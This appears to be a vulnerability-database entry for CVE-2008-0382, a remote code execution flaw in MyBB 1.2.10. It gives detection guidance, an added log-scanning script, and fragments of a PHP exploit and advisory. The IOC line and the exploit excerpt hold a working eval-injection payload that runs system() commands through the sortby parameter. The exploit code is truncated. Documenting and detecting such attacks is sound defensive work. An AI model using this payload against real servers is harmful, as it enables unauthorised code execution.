CVE-2008-0382
Published 2008-01-22
Priority P261 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 41.87% (98.5th percentile)
Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1) forumdisplay.php or (2) a results action in search.php.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mybulletinboard | mybulletinboard | — | — |
Detection & IOCs
command: `forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['`
- Detect eval injection attempts via the `sortby` GET parameter containing PHP injection payloads (e.g., `'];`, `phpinfo()`, `system(`, `readfile(`) in requests to forumdisplay.php or search.php.
- Monitor for the exploit's output delimiter pattern — asterisk-wrapped command output (`*<output>*`) in HTTP responses, used by the exploit script to parse remote command execution results.
- Requests to search.php must include `action=results` alongside a malicious `sortby` parameter; detection rules should match both parameters together for this attack vector.
- No authentication is required for exploitation; the attacker only needs a valid forum `fid` (for forumdisplay.php) or a valid search `sid` (for search.php), both of which are trivially obtainable.
- The forumdisplay.php attack vector requires a valid forum `fid` to be known by the attacker, but this is typically publicly visible in any forum listing.
- The search.php attack vector requires a valid search `sid`, but the advisory notes this is a trivial prerequisite to satisfy.
- Both RCE vectors are present in MyBB 1.2.10 and earlier; upgrading to 1.2.11 remediates the vulnerability.
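A log-side check for the request patterns listed above, as an added example (not from the original page, the advisory or the MyBB project). It assumes combined-format access logs and that legitimate `sortby` values are plain identifiers; the function names, the allow-list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Payload markers the page names for the sortby parameter.
TOKENS = ("'];", "phpinfo(", "system(", "readfile(")
# Assumption (not from the page): legitimate sortby values are plain identifiers.
PLAIN = re.compile(r"[A-Za-z0-9_]{0,32}")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

def query_params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key).lower(), []).append(unquote_plus(value))
    return params

def inspect_target(target):
    """Return a finding dict for one request target, or None if it looks clean."""
    path, _, query = target.partition("?")
    script = path.rsplit("/", 1)[-1].lower()
    if script not in ("forumdisplay.php", "search.php"):
        return None
    params = query_params(query)
    # Per the page, the search.php vector needs action=results with sortby.
    if script == "search.php" and "results" not in params.get("action", []):
        return None
    for value in params.get("sortby", []):
        hits = [t for t in TOKENS if t in value.lower()]
        if hits or not PLAIN.fullmatch(value):
            return {"script": script, "sortby": value, "tokens": hits}
    return None

def scan(lines):
    """Return (line_number, finding) for every flagged access-log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        finding = inspect_target(match.group(1)) if match else None
        if finding:
            findings.append((number, finding))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up sizes and sid).
SAMPLE_LOG = r"""
203.0.113.7 - - [16/Jan/2008:10:00:01 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=']=1;echo%20'*';%20system('id');echo%20'*';%20$orderarrow[' HTTP/1.1" 200 5120
198.51.100.4 - - [16/Jan/2008:10:00:05 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=lastpost&order=desc HTTP/1.1" 200 20480
203.0.113.7 - - [16/Jan/2008:10:00:09 +0000] "GET /mybb/search.php?action=results&sid=abc123&sortby=%27%5D%3Bphpinfo()%3B HTTP/1.1" 200 4096
198.51.100.4 - - [16/Jan/2008:10:00:12 +0000] "GET /mybb/search.php?action=results&sid=abc123&sortby=subject HTTP/1.1" 200 9000
""".strip().splitlines()
```

Calling `scan(SAMPLE_LOG)` flags lines 1 and 3; values are percent-decoded before matching, so the encoded form on line 3 is caught as well.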
No detection rules found.
Exploit-DB
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
exploitdb·2008-01-16
CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB
# milw0rm.com [2008-01-16]
Exploit-DB
MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities
exploitdb·2008-01-16
CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities
---
[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
Author: Janek Vind "waraxe"
Independent discovery: koziolek
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-61.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.
Vulnerabilities discovered
1. Remote Code Execution in "forumdisplay.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditio
No writeups or analysis indexed.
- http://secunia.com/advisories/28509
- http://securityreason.com/securityalert/3559
- http://www.securityfocus.com/archive/1/486434/100/0/threaded
- http://www.securityfocus.com/bid/27322
- https://www.exploit-db.com/exploits/4927
- https://www.exploit-db.com/exploits/4928